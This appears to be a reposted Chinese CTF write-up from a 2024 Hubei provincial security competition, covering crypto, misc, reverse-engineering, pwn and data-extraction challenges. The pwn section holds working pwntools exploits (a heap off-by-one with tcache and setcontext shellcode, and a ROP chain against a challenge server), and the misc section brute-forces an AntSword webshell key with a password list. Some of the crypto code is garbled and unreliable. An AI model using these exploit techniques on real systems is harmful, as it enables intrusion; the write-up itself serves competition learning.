F = [(36081831373398765496490121898118275331597167308301671911642273861563666664545*i + 20818485079783326431414952124332440995164298376805349071762867760925654560129, 2080527476644284459469754065728582261439110792635520661740429151724797376184*i + 22485923248080983391383279592637691489160934672854638306617785344436031827838, 15544373162545014827602222261755865080947187122261471926061663568794038512828*i + 65994932829738499994169748656063604384011854387402875895186473718226656419067), (3553534440103543686958858303956716887328727627636404431097647427819509340361*i + 41182149981825439188243414995474733005799065992663037326956422731949977723727, 11444151159046255413538671703716370245288291793592500278345001664024824339590*i + 1802783416049323926195923226865768221398255563865542946492803065162093093803, 15739175840903697568714274177182938758189586472507039731239155962622285528109*i + 38249065906628598713138583591858150126778794837077688369911160900556744463900), (14364753807737302773559096493138893453118094354943941768609481298414054855231*i + 16290236676179704559365899211744462983770375364688247022596145726641137243214, 3863306473986430132042752882629555431418515741358351198972027547882636615940*i + 1209446834271293681961506708684952401569936830292701272655835127315444154958, 21868026584808712490812183410257662299067350008298604021123682243508255905173*i + 12828201007038003022201361213007595366913298546122923089499182187938898042596)]
ct = 96910798667771988374291172958072220832574586618080134344021393928577220469428
T, S, G = [M(ii) for ii in pk]
F = M(F)
############################################################### attack
E = A*T*A
detT, detS, detG, detE, detF = A.det(), T.det(), S.det(), G.det(), E.det(), F.det()
r = 2244966557637008779362441591080406338119704738381872153797151
#R = 80839783875482453208291688688697485912290384775841712705111124172946909733768714734343762988749579725275997021760357500939
#r = discrete_log(detG^R, ((detA^(-1)*detT).sqrt())^R, ord=(p^2-1)//R)
#s = discrete_log(((detA^(-2)*detT^(-1)*detF).sqrt())^R, detG^R, ord=(p^2-1)//R)
#not enough so use cado-nfs
这里不够,用上cado-nfs
step2
import subprocess
command = [
'./cado-nfs.py',
'-dlp',
str(r),
'+str(t1), =
str(p)
]
#1541758195020130454925136833461872657607368759409055632195831
command = [
'./cado-nfs.py',
'-dlp',
str(r),
'+str(t2), =
str(p)
]
#780392429787953543532147509264510635118839088869098098140941
try:
result = subprocess.run(command, check=True, text=True, capture_output=True)
print(result.stdout)
except subprocess.CalledProcessError as e:
{e.returncode}") :
", e.stderr) :
step3
#t2^s = t1
Fr = GF(r)
s1 = Fr(1541758195020130454925136833461872657607368759409055632195831)
s2 = Fr(780392429787953543532147509264510635118839088869098098140941)
ss = discrete_log(pow(t1, 6*r, p), pow(t2, 6*r, p), operation="*", ord=(p-1)//r)
s = crt([int(ss), int(s1/s2)], [(p-1)//(6*r), r])
ss = s
for ii in range(6):
s = ss + ii * (p-1) // 6
D = G^int(s)
K = list(D*S*D)
key = sum(K[0])+sum(K[1])+sum(K[2])
mask = int(sha256(str(key).encode()).hexdigest(),16)
pt = ct ^^ mask
= detF): =
print(long_to_bytes(pt))
break
#QAQ~4_Br0ken_Crypto_Sy5tem~TAT
CRYPTO.05
✦✦✦ 8 ddd
操作内容:
使用工具一把梭
MISC.01
✦✦✦ 9 gza_Cracker
操作内容:
pass是Antsword
key则是在这里面
echo substr(md5($pass.$key),0,16);//前缀
echo base64_encode(encode(@run($data),$key)); //加密数据
echo substr(md5($pass.$key),16); //后缀
e71f50e9773b23f9 是前缀,根据这个可以爆破key
$keylist = array(
"123456",
"password",
"12345678",
"1234",
"admin@123",
"pussy",
"12345",
"dragon",
"qwerty",
"696969",
"mustang",
"letmein",
"baseball",
"master",
"michael",
"football",
"shadow",
"monkey",
"abc123",
"pass",
"fuckme",
"6969",
"jordan",
"harley",
"ranger",
"iwantu",
"jennifer",
"hunter",
"fuck",
"2000",
"test",
"batman",
"trustno1",
"thomas",
"tigger",
"robert",
"access",
"love",
"buster",
"1234567",
"soccer",
"hockey",
"killer",
"george",
"sexy",
"andrew",
"charlie",
"superman",
"asshole",
"fuckyou",
"dallas",
"jessica",
"panties",
"pepper",
"1111",
"austin",
"william",
"daniel",
"golfer",
"summer",
"heather",
"hammer",
"yankees",
"joshua",
"Antsw0rd",
"maggie",
"biteme",
"enter",
"ashley",
"thunder",
"cowboy",
"silver",
"richard",
"fucker",
"orange",
"merlin",
"michelle",
"corvette",
"bigdog",
"cheese",
"matthew",
"121212",
"patrick",
"martin",
"freedom",
"ginger",
"blowjob",
"nicole",
"sparky",
"yellow",
"camaro",
"secret",
"dick",
"falcon",
"taylor",
"111111",
"131313",
"123123",
"bitch",
"hello"
);
$pass = "Antsword";
foreach ($keylist as $key)
{
if(substr(md5($pass.substr(md5($key), 0, 16)),0,16)=="e71f50e9773b23f9")
{
echo "key is: ".$key."<br>";
echo "16bit: ".substr(md5($key), 0, 16);
}
}
key拿到即可解密:
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='Antsword';
$key = 'a18551e65c48f51e';
$str = "";
$data = encode(base64_decode($str), $key);
echo gzdecode($data);
MISC.02
✦✦✦ 10 不良劫
操作内容:
2024 天山固网杯决赛参考链接:
https://blog.jacki.cn/2024/11/29/%E5%A4%A9%E5%B1%B1%E5%9B%BA%E7%BD%91/#CRYPTO-ddd
ps 调整色阶 将非纯黑色变得更明显
再进行定位点还原和修补
微信扫码:得到 DASCTF{014c6e74-0c4a-48fa 一半flag
使用 WaterMarkH 提取盲水印 得到第二半flag -8b33-ced16f847e39}
flag值:
DASCTF{014c6e74-0c4a-48fa-8b33-ced16f847e39}
MISC.03
✦✦✦ 11 马赛克
操作内容:
使用工具载入镜像
发现有个flag的压缩包。打开发现文件损坏。
还发现一个password的文件
打开后发现是图片,改后缀打开,发现密码被打马赛克。
将图片缩小,大概能猜出密码是ILIKEFORENSICS
在镜像中还发现了一个奇怪的txt文件,“打乱.txt”
导出打开后发现是加密算法
还原后,删除多余的0,使用密码解压,得到flag
```
f = open('./flag.zip', 'rb').read()
n = open('./new.zip', 'wb')
L = len(f)
for i in range(int(L/10)):
n.write(f[5*i :5*i+5])
n.write(f[L-5*i-5:L-5*i])
```
将压缩包还原
```
with open(r"C:UsersCrazyDesktopflag.zip",'rb') as f:
tmp = f.read()
L = len(tmp)
print(L)
o_f_zip = bytearray(L)
for i in range(L//10):
o_f_zip[5*i:5*i+5] = tmp[10*i:10*i+5]
o_f_zip[L-5*i-5:L-5*i] = tmp[10*i+5:10*i+10]
with open(r"C:UsersCrazyDesktopflag2.zip",'wb') as f2:
f2.write(o_f_zip)
MISC.04
✦✦✦ 12 特殊的流量
操作内容:
找响应码为200的包,发现有一个压缩包
可以看到被替换后的密钥
看到edffd5be04cc060e343cad479a8b845c就是secret的md5hash
import hashlib
import itertools
# 原始MD5哈希
original_md5 = "edffd5be04cc060e343cad479a8b845c"
# 替换后的密文
ciphertext = "xx34d619x1brxgd9mgd4xzxwxytv669wn"
# 定义替换字符集
replacement_chars = ['i', '7', 'x']
# 获取x的位置
x_positions = [i for i, char in enumerate(ciphertext) if char == 'x']
# 创建一个掩码,所有位置上的x都将被替换成1或7
def generate_candidates():
# 生成所有可能的替换组合
for replacement in itertools.product(replacement_chars, repeat=len(x_positions)):
# 将替换的字符按位置放入密文中
candidate = list(ciphertext)
for pos, replacement_char in zip(x_positions, replacement):
candidate[pos] = replacement_char
yield ''.join(candidate)
# 比较每个候选密文的MD5值
def crack():
for candidate in generate_candidates():
# 计算候选密文的MD5值
candidate_md5 = hashlib.md5(candidate.encode()).hexdigest()
if candidate_md5 == original_md5:
print(f"Found the original ciphertext: {candidate}")
return candidate
print("No match found.")
return None
if __name__ == "__main__":
# 执行破解过程
爆破得明文:
i734d619i1brigd9mgd4xz7w7ytv669w
继续往下看,输出了一堆密文到flag.txt中
U2FsdGVkX18tplkP51SopY26cczUyjuT8tP9j3Ofqv5XF5njA7CygY125iYhxplSQTNoT/kcwoN1z+4a4r/+9JtONfutcHXoyCv2tLseBHr802V/RRtFaZnZc3DM/trRmjk5SAyMSgvN+laSp6uK8eAOq7yKWq7FI+En5cu+j7+bxiuceviSoJ9gEw3SfEMtz4rYbKHagq8aCAlKPEevM+HVSnGSrMoy6QS8oQPgHkafdVj2m1HmfkdQFL5q7qYvrxVlRLbm657I0VIIusf8Q6+rsvlh28HrE3MzLlu6fd/cQ7nsZKuKYo0u4pc/yvI3RZglrd7Fb6piO4ryhs2g1g==
使用工具解密
可以看到非数字的英文取首字母,转换后得到flag
flag值:
DASCTF{3fd34b59-4e9d-4390-927b-1346d5364d99}
MISC.05
✦✦✦ 13 PixMatrix
操作内容:
根据题目所说, 图像进行块级转置即可
from PIL import Image
import numpy as np
def swap_quadrants(block):
"""
Swaps the top-right and bottom-left quadrants of an 8x8 block.
Parameters:
block (numpy.ndarray): An 8x8 (or block_size x block_size) array representing the
image block.
Returns:
numpy.ndarray: The block with swapped quadrants.
"""
half = block.shape[0] // 2
top_right = block[:half, half:].copy()
bottom_left = block[half:, :half].copy()
# Swap the quadrants
block[:half, half:] = bottom_left
block[half:, :half] = top_right
return block
def blockwise_transpose(image, block_size=8):
"""
Performs a block-wise transpose on the given image by swapping specific quadrants
within each block.
Parameters:
image (PIL.Image.Image): The input image to be processed.
block_size (int): The size of each block (default is 8).
Returns:
PIL.Image.Image: The transposed image.
"""
width, height = image.size
image_array = np.array(image)
# Handle grayscale images by ensuring consistent dimensions
if image_array.ndim == 2:
image_array = image_array[:, :, np.newaxis]
channels = image_array.shape[2]
transposed_array = image_array.copy()
for y in range(0, height, block_size):
for x in range(0, width, block_size):
# Extract the block
block = image_array[y:y + block_size, x:x + block_size].copy()
# Ensure the block is the correct size (it might be smaller at the edges)
if block.shape[0] < block_size or block.shape[1] < block_size:
continue
# Swap quadrants within the block
transposed_block = swap_quadrants(block)
# Assign the transposed block back to the array
transposed_array[y:y + block_size, x:x + block_size] = transposed_block
# Remove the singleton dimension for grayscale images
if transposed_array.shape[2] == 1:
transposed_array = transposed_array.reshape((height, width))
return Image.fromarray(transposed_array)
def process_image(input_path, output_path, block_size=8, display=False):
"""
Processes the image by performing a block-wise transpose and saves the result.
Parameters:
input_path (str): Path to the input image.
output_path (str): Path to save the transposed image.
block_size (int): The size of each block (default is 8).
display (bool): Whether to display the transposed image (default is False).
"""
try:
# Open the image
with Image.open(input_path) as img:
# Perform block-wise transpose
transposed_img = blockwise_transpose(img, block_size)
# Save the transposed image
transposed_img.save(output_path)
print(f"Transposed image saved as {output_path}.")
# Optionally display the image
if display:
transposed_img.show()
except Exception as e:
print(f"An error occurred: {e}")
if __name__ == "__main__":
# Define input and output paths
input_image_path = "PixMatrix.jpg" # Update with your image file
output_image_path = "transposed_image.jpg" # Update with desired output path
# Process the image
process_image(input_image_path, output_image_path, block_size=8, display=True)
REVERSE.01
✦✦✦ 14 bouquet
操作内容:
无壳32位,题目上说有花指令,找爆红
U一下c一下nop掉再按p分析函数去花;
Shift+f12
检测到可疑字符串
我们可以使用动调检测一下,单字节比较
于是写脚本爆破
import subprocess
import time
def execute_process_with_input_data(executable_path, input_payload, timeout=10):
"""
启动外部程序,并通过管道与其交互,返回标准输出和错误输出。
:param executable_path: 可执行文件路径
:param input_payload: 传递给外部程序的输入数据
:param timeout: 超时时间
:return: (标准输出, 错误输出) 元组
"""
try:
# 启动外部进程并通过管道与其交互
process_handler = subprocess.Popen(
executable_path,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
# 使用 communicate 方法发送输入并获取输出
standard_output, error_output = process_handler.communicate(input=input_payload, timeout=timeout)
return standard_output, error_output
except subprocess.TimeoutExpired:
process_handler.kill() # 如果超时,则终止进程
standard_output, error_output = process_handler.communicate()
return "Execution Timed Out", error_output
def generate_input_payload(char_array, outer_index, test_char):
"""
根据外部索引和字符集构建输入数据。
:param char_array: 当前字符数组
:param outer_index: 外部索引
:param test_char: 当前测试字符
:return: 构建的输入数据
"""
char_array[outer_index] = test_char # 修改当前字符位置
return ''.join(char_array) + "n" # 构建输入数据
def check_output_lines(standard_output, expected_lines):
"""
检查输出行数是否符合预期。
:param standard_output: 外部程序的标准输出
:param expected_lines: 期望的输出行数
:return: 如果输出行数符合预期则返回 True,否则返回 False
"""
output_lines = standard_output.split("n")
return len(output_lines) == expected_lines
def main():
executable_path = "bouquet.exe" # 可执行文件路径
char_array = ['*'] * 25 # 初始化字符数组
char_set = 'j7aw_sC3addq4TAo}8_Fda{SD' # 字符集
# 外层循环遍历字符位置
for outer_index in range(25):
# 内层循环遍历字符集
for test_char in char_set:
# 构建输入数据
input_payload = generate_input_payload(char_array, outer_index, test_char)
# 执行进程并获取输出
standard_output, error_output = execute_process_with_input_data(executable_path, input_payload)
# 计算期望的输出行数
expected_lines = 49 - outer_index * 2
# 检查输出行数是否符合预期
if check_output_lines(standard_output, expected_lines):
print(test_char, end="") # 如果符合条件,打印当前字符
break # 退出内层循环继续下一位置的字符测试
if __name__ == "__main__":
main()
flag值:
DASCTF{asd48_daj7w_3adqo}
REVERSE.02
✦✦✦ 15 go_bytes
操作内容:
从题目中可以看出是go语言写的
· runtime_stringtoslicebyte() 可能是一个将字符串转换为字节切片的函数。
· 循环内部,似乎在对某些数据进行处理,通过位操作(如右移和按位或)来修改数据。这可能是对输入数据的加密或某种算法的执行。
栈空间管理:程序在开始时会检查栈是否足够,如果不足则请求更多的栈空间。
内存分配与初始化:通过 runtime_newobject() 创建新的对象,并初始化其值。
数据处理与加密:代码通过复杂的位操作对数据进行处理,可能涉及加密算法或数据转换。
数据验证:对处理后的数据进行验证,确保其符合预期。如果数据不匹配,则程序会退出并输出错误信息。
文件/流操作:在多个地方进行格式化的输入输出操作。
数据通过 v12[j] 与计算出的 main_tmp ^ v8 进行验证。如果不匹配,程序会通过 fmt_Fprintln() 打印错误信息,并调用 os_Exit(v9) 退出程序。
import binascii
def generate_calculated_values(initial_value, num_values=40, multiplier=291, addend=1110, mask=0xFFFF):
"""
生成一系列按给定公式计算的数值。
:param initial_value: 初始值
:param num_values: 要生成的数值数量
:param multiplier: 乘数
:param addend: 加数
:param mask: 位掩码,确保结果不超过16位
:return: 计算后的数值列表
"""
values = []
current_value = initial_value
for _ in range(num_values):
current_value = (multiplier * current_value + addend) & mask # 公式计算并确保结果不超过16位
values.append(current_value)
return values
def xor_data_with_values(data, values):
"""
对数据进行逐元素的异或运算。
:param data: 需要处理的原始数据
:param values: 用于异或运算的数值列表
:return: 处理后的数据列表
"""
return [data[i] ^ values[i] for i in range(len(data))]
def modify_data_order(data):
"""
将数据的最后一个字节移到最前面,其他字节向后移动。
:param data: 输入数据
:return: 修改后的数据
"""
return bytes([data[-1]]) + data[:-1]
def main():
# 原始数据,十六进制格式
hex_numbers = [
0x22B9, 0x0C9F8, 0x8C89, 0x0FF18, 0x1439, 0x4E0A, 0x2A8B, 0x7CB,
0x0BDEB, 0x0FAAB, 0x3FFB, 0x784B, 0x9F1E, 0x4FEB, 0x4D0B, 0x0D08E,
0x38BB, 0x0CBAE, 0x0D2CE, 0x913E, 0x0A6B, 0x0F03B, 0x507B, 0x398B,
0x93DE, 0x3CCE, 0x459E, 0x4ABE, 0x553E, 0x316E, 0x33BE, 0x42FE,
0x0CECE, 0x4DDE, 0x982B, 0x0A31B, 0x802E, 0x12EE, 0x0F67A, 0x0EB79
]
# 初始值
initial_value = 0xdead
# 生成经过公式计算的数值
calculated_values = generate_calculated_values(initial_value)
# 对原始数据进行异或运算
modified_numbers = xor_data_with_values(hex_numbers, calculated_values)
# 将处理后的数据转换为字节流
hex_data = binascii.hexlify(bytes(modified_numbers))
# 将字节流最后一个字节移到最前面
modified_data = modify_data_order(hex_data)
# 输出结果
print("Modified Data:", modified_data)
# 运行主函数
if __name__ == "__main__":
main()
flag值:
DASCTF{faddff8cb4d711edbb2294085339ce84}
REVERSE.03
✦✦✦ 16 Zistel
操作内容:
ELF文件,拖入ida看一下
进去之后f5可以看到三行代码,可以跟进第一个函数
跟进之后看到了一个sub_10021BA函数
进去看一下
在32行那里看到了input字样
可以看出是让我们输入,目前看不出什么,我们进行ida远程调试,看一下在哪进行加密操作
这里看到了可疑的函数
里面好多内联汇编代码
初始化了寄存器和栈上的数据。
使用SIMD指令进行高效的数据存储和加载。
对输入数据进行迭代处理,可能在进行某种加密、散列或校验计算。具体的计算使用了sub_100261B函数和异或运算。
最终将计算结果存储到xmm0寄存器,并返回一个__int64类型的结果
在上一级函数中下面看到了一个dword,双击进去
怀疑是密文,继续审计
这里是一些验证,有try again和correct的字样
在这个函数中可以看出一些yihuo字节交换,和迭代处理的操作
代码:
typedef uint32_t uint32;
uint32 data1[] = {0x33293158, 0x60760211, 0x42185F46, 0x63746F29};
uint32 data2[] = {
0xBBDBD183, 0x05340F2E, 0xBEEFDEAD, 0xBBDBD183, 0x05340F2E, 0xBEEFDEAD,
0xBBDBD183, 0x05340F2E, 0xBEEFDEAD, 0xBBDBD183, 0x05340F2E, 0xBEEFDEAD,
0xBBDBD183, 0x05340F2E, 0xBEEFDEAD, 0xBBDBD183, 0x05340F2E, 0xBEEFDEAD,
0xBBDBD183, 0x05340F2E
};
uint32 lookup_table[0x100];
void byte_swap(uint32 *num) {
unsigned char *byte_ptr = (unsigned char*) num;
unsigned char temp;
for (int i = 0; i < 2; ++i) {
temp = byte_ptr[i];
byte_ptr[i] = byte_ptr[3 - i];
byte_ptr[3 - i] = temp;
}
}
int main() {
// 初始化 lookup_table
for (int i = 0; i < 0x100; ++i) {
lookup_table[i] = i & 3;
}
for (int idx = 0; idx < 4; idx += 2) {
uint32 first = data1[idx];
uint32 second = data1[idx + 1];
for (int j = 19; j >= 0; --j) {
uint32 temp = second;
second ^= data2[j];
for (int k = 0; k < 4; ++k) {
uint8_t temp_idx = lookup_table[(data2[j] >> (k * 8)) & 0xff];
uint8_t temp_val = (second >> (k * 8)) & 0xff;
unsigned char second_byte_array[4];
memcpy(second_byte_array, &second, sizeof(second));
unsigned char tmp = second_byte_array[k];
second_byte_array[k] = second_byte_array[temp_idx];
second_byte_array[temp_idx] = tmp;
memcpy(&second, second_byte_array, sizeof(second));
}
second ^= data2[j];
second ^= first;
first = temp;
}
DASCTF{z1g_I3_S0_Coo0l!}
PWN.01
✦✦✦ 17 EZheap_2
操作内容:
Off by one漏洞,堆菜单题目,固定模板构造堆块重叠,Show能泄露pie或者堆地址,这里选择pie地址,这样就能tcachebin attack打stdout,泄露出libc地址,然后2.27orw固定模板直接梭哈
代码:
from pwn import *
from struct import pack
from ctypes import *
from LibcSearcher import *
import base64
import gmpy2
li = lambda x : print('x1b[01;38;5;214m' + x + 'x1b[0m')
ll = lambda x : print('x1b[01;38;5;1m' + x + 'x1b[0m')
def s(a):
p.send(a)
def sa(a, b):
p.sendafter(a, b)
def sl(a):
p.sendline(a)
def sla(a, b):
p.sendlineafter(a, b)
def r():
p.recv()
def pr():
print(p.recv())
def rl(a):
return p.recvuntil(a)
def inter():
p.interactive()
def bug():
gdb.attach(p)
pause()
def get_addr():
return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))
def get_addr1():
return u32(p.recvuntil("xf7")[-4:].ljust(4,b"x00"))
def get_sb():
return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))
context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn')
p = remote('', )
elf = ELF('./pwn')
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc=ELF("/root/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc.so.6")
def cmd(i):
sla(b'Your choice:',str(i))
def add(idx,size):
cmd(1)
sla(b'index:',str(idx))
sla(b'Size:',str(size))
def edit(idx,con):
cmd(2)
sla(b'index:',str(idx))
sa(b'context:',con)
def free(idx):
cmd(3)
sla(b'index:',str(idx))
def show(idx):
cmd(4)
sla(b'choose:',str(idx))
add(0,0x18) #0
add(1,0x68) #1
add(2,0x68) #2
add(3,0x18) #3
add(10,0x68) #2
add(11,0x68) #2
edit(0,b'x00'*0x18+p8(0xe1))
free(1)
add(4,0xd8)
show(4)
rl(b'n')
pie=int(p.recv(14),16)-0x202160
free(10)
free(11)
free(2)
edit(4,b'a'*0x68+p64(0x71)+p64(pie+0x202020))
add(5,0x68)
add(6,0x68)
add(7,0x68)
edit(7,p64(0xfbad1800) + p64(0)*3 + b'x00')
libc_base=get_addr()-0x3ed8b0
li(hex(libc_base))
rdi = libc_base+libc.search(asm("pop rdinret")).__next__()
rsi = libc_base+libc.search(asm("pop rsinret")).__next__()
rdx = libc_base+libc.search(asm("pop rdxnret")).__next__()
rax = libc_base+libc.search(asm("pop raxnret")).__next__()
ret = libc_base+libc.search(asm("ret")).__next__()
syscall=libc_base+libc.search(asm("syscallnret")).__next__()
jmp_rsp=libc_base+libc.search(asm("jmp rsp")).__next__()
free_hook=libc_base+libc.sym['__free_hook']
setcontext=libc_base+libc.sym['setcontext']+53
open_addr=libc_base+libc.sym['open']
read_addr=libc_base + libc.sym['read']
write_addr=libc_base + libc.sym['write']
payload=(b'x00'*0x68+p64(0)+p64(free_hook&0xfffffffffffff000)+p64(0)*2+p64(0x2000)).ljust(0xa0,b'x00')+p64(free_hook&0xfffffffffffff000)+p64(syscall)
free(5)
edit(4,b'x00'*0x68+p64(0x71)+p64(free_hook))
add(5,0x68)
add(6,0x68)
edit(6,p64(setcontext))
add(15,0x400)
edit(15,payload)
free(15)
payload = p64(rdi)+p64(free_hook&0xfffffffffffff000)
payload += p64(rsi)+p64(0x1000)
payload += p64(rdx)+p64(7)
payload += p64(rax)+p64(10)
payload += p64(syscall)
payload += p64(jmp_rsp)
payload += asm(shellcraft.open('/flag'))
payload += asm(shellcraft.read(3,free_hook+0x300,0x30))
payload += asm(shellcraft.write(1,free_hook+0x300,0x30))
sl(payload)
inter()
flag值:
DASCTF{10737193860912531286748686403102}
PWN.02
✦✦✦ 18 Inequable Canary
操作内容:
源鲁杯原题,除了交互不一样,其他都一样
链接:
https://xz.aliyun.com/t/15840?time__1311=GqjxnDgDyC0QDsD7zG7W%3DqxWw8iVWiW4D#toc-4
代码:
from pwn import*
def s(a):
p.send(a)
def sa(a,b):
p.sendafter(a,b)
def inter():
p.interactive()
context(log_level = 'debug',arch = 'amd64')
p=remote("139.155.126.78",27641)
elf=ELF('./canary')
vuln=0x400820
stack_fail_got=0x601038
sa("Say some old spells to start the journeyn",p64(vuln))
sa("Tell me the location of the Eye of the Deep Sean",b'a'*8+p64(stack_fail_got))
sa("I have magicn",p64(0x400a5f)) #pop 3
pop_rdi=0x400a63
pop_rsi_r15=0x400a61
read_got=0x601040
write_addr=0x4006E0
payload=p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(read_got)+p64(0)+p64(write_addr)+p64(vuln)
sa("Let's go!n",payload)
libc_base=u64(p.recvuntil('x7f')[-6:].ljust(8, b'x00'))-0x10e1e0
bss=0x601060+0x800
sa("Tell me the location of the Eye of the Deep Sean",b'a'*8+p64(bss))
sa("I have magicn",b'flagx00x00x00x00') #pop 3
pop_rdi=0x400a63
pop_rsi_r15=0x400a61
read_got=0x601040
write_addr=0x4006E0
pop_rax=libc_base+0x36174
pop_rdx_r12=libc_base+0x119431
syscall_ret=libc_base+0x47656 #syscall pop_rbp ret
payload=p64(pop_rdi)+p64(bss)+p64(pop_rsi_r15)+p64(0)*2+p64(pop_rax)+p64(2)+p64(syscall_ret)+p64(0) #open
payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi_r15)+p64(bss+0x100)*2+p64(pop_rdx_r12)+p64(0x100)*2+p64(pop_rax)+p64(0)+p64(syscall_ret)+p64(0)#read
payload+=p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(bss+0x100)*2+p64(pop_rdx_r12)+p64(0x100)*2+p64(pop_rax)+p64(1)+p64(syscall_ret)+p64(0)
sa("Let's go!n",payload)
inter()
flag值:
DASCTF{95400240268504043541865376132978}
DB.01
✦✦✦ 19 DB
操作内容:
正则匹配匹配出来
代码:
import re
import csv
def validate_phone(phone):
"""
Validates if a given phone number is a valid 11-digit number
and matches the specified prefixes.
"""
valid_prefixes = [
'734', '735', '736', '737', '738', '739', '747', '748', '750', '751', '752', '757', '758', '759', '772',
'778', '782', '783', '784', '787', '788', '795', '798', '730', '731', '732', '740', '745', '746', '755',
'756', '766', '767', '771', '775', '776', '785', '786', '796', '733', '749', '753', '773', '774', '777',
'780', '781', '789', '790', '791', '793', '799'
]
return re.fullmatch(r'd{11}', phone) and phone[:3] in valid_prefixes
# Read the data file, extract potential numbers, filter valid ones, and write to CSV
with open("a.txt", encoding="utf-8") as file:
data = file.read()
potential_numbers = re.findall(r'bd{11}b', data)
valid_numbers = [num for num in potential_numbers if validate_phone(num)]
output_data = [["category", "value"]] + [["phone", num] for num in valid_numbers]
with open("output.csv", mode="w", encoding="utf-8", newline="") as csvfile:
writer = csv.writer(csvfile)
writer.writerows(output_data)
print(f"Extracted {len(valid_numbers)} valid phone numbers. Results saved to output.csv.")
-- 结束 --
○
以上为本次比赛WP如有问题请留言私信公众号
赛事举办联系方式
联系人:张先生
VX:Evan-xuanjing
往期回顾
-天权信安网络安全团队-
网络无边 安全有界
用技术撬动未来,用奋斗描绘成功!
天权信安网络安全团队(简称“天权信安”),成立于2022年,是一支研究红蓝对抗、内网渗透、红队武器库、CTF竞赛及其网安相关活动的安全团队。这里聚集着一群有技术有担当有理想、热爱信安奉献信安的多方面专业人才。天权信安的“天权”来源于北斗七星,又称为文曲星,它代表着天资聪颖,能力超群,也象征着天权信安的高标准、高水平与高质量,体现着我们的宗旨--打造一支作风优良、实力强劲、团结协作的精英团队,用技术与毅力共同守护网络安全。目前成员 40 余人,成员也来自于黄鹤网络安全实验室,队员分布于阿尔托大学(国外)、科大、华科、电子科大、警大、江苏海洋大学、国际关系学院、广大、河北师大、吉林师大、西南石油、安工院、湖工大、华师大、湘大、湖南工程学院等国内各大高校,也分布于绿盟科技、奇安信、长亭科技、安恒信息、联通、移动等国内大厂。为“网络安全爱好者”提供一个更好的学习交流生态圈,天权信安欢迎技术大咖、攻防渗透、CTF选手等资深专业人士前来分享网络安全前沿技术、攻防实战经验、内网渗透、IOT安全、电子取证、CTF、APT、工控安全等技术,通过经验分享,来帮助大家了解最新网络安全动态,提升安全技术水平,拓宽知识领域,致力于打造一个开放共享的网络安全生态圈。
原文始发于微信公众号(天权信安):2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论